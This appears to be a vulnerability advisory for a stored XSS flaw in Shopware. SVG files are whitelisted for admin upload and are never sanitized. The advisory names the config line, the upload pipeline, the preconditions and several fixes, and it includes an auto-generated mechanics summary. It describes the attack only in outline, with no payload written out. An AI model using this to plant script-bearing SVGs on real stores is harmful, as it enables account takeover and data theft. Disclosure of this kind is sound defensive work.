Shopware: Stored XSS via SVG file upload — no SVG sanitization
Description
SVG files are in the allowed_extensions whitelist and can be uploaded by any admin user via the media manager. There is zero SVG content sanitization anywhere in the upload pipeline. A malicious SVG with JavaScript (onload, `, `) executes in the context of the Shopware domain when accessed.
The
Problem
In src/Core/Framework/Resources/config/packages/shopware.yaml, line 194:
allowed_extensions: ["jpg", "jpeg", "png", "webp", "avif", "gif", "svg", ...]
SVG is whitelisted. The upload path (MediaUploadController → FileSaver → TypeDetector) recognizes SVG as ImageType with VECTOR_GRAPHIC flag, but no code strips JavaScript, event handlers, or external entity references from the SVG XML.
A search of the entire codebase for SVG sanitization returns — no DOMPurify, no svg-sanitize, no strip_tags on SVG content, nothing.
Impact
Stored XSS affecting all users who view the uploaded SVG. In an e-commerce context, this can lead to admin account takeover, customer data theft, or malicious plugin installation.
Suggested
Fix
Either:
- **Remove SVG from
allowed_extensions** if SVG upload is not a core requirement - Sanitize SVG content on upload using a library like
enshrined/svg-sanitize(strips scripts, event handlers, external references) - **Serve SVGs with
Content-Disposition: attachment** to prevent inline rendering - Serve SVGs from a separate domain (like Nextcloud's
usercontent.apps.nextcloud.com)
Option 2 is the most practical — enshrined/svg-sanitize is already used by WordPress and other PHP projects.
Regards & BG, Keyvan Hardani
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"SVG files are not sanitized for malicious JavaScript content during upload."
Attack vector
An attacker uploads a malicious SVG file containing JavaScript, such as `onload` handlers or `<script>` tags, through the media manager. The application whitelists SVG files and does not perform any sanitization on their content [ref_id=1]. When another user accesses this uploaded SVG, the JavaScript executes within the context of the Shopware domain [ref_id=2].
Affected code
The vulnerability lies in the `allowed_extensions` configuration within `src/Core/Framework/Resources/config/packages/shopware.yaml`, which includes SVG. The upload pipeline, involving `MediaUploadController`, `FileSaver`, and `TypeDetector`, recognizes SVG as an image type but fails to strip JavaScript or other malicious elements from the XML content [ref_id=1, ref_id=2].
What the fix does
The advisory suggests several remediation strategies, as no specific patch is provided. These include removing SVG from the list of allowed extensions if not essential, sanitizing SVG content on upload using a library like `enshrined/svg-sanitize` to strip scripts and event handlers, serving SVGs with a `Content-Disposition: attachment` header to prevent inline rendering, or serving SVGs from a separate domain [ref_id=1, ref_id=2].
Preconditions
- authThe attacker must have admin user privileges to access the media manager and upload files.
- inputThe attacker must craft a malicious SVG file containing executable JavaScript.
Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
1- Shopware: Nine Vulnerabilities Disclosed, Including Privilege Escalation and XSSVypr Intelligence · Jun 4, 2026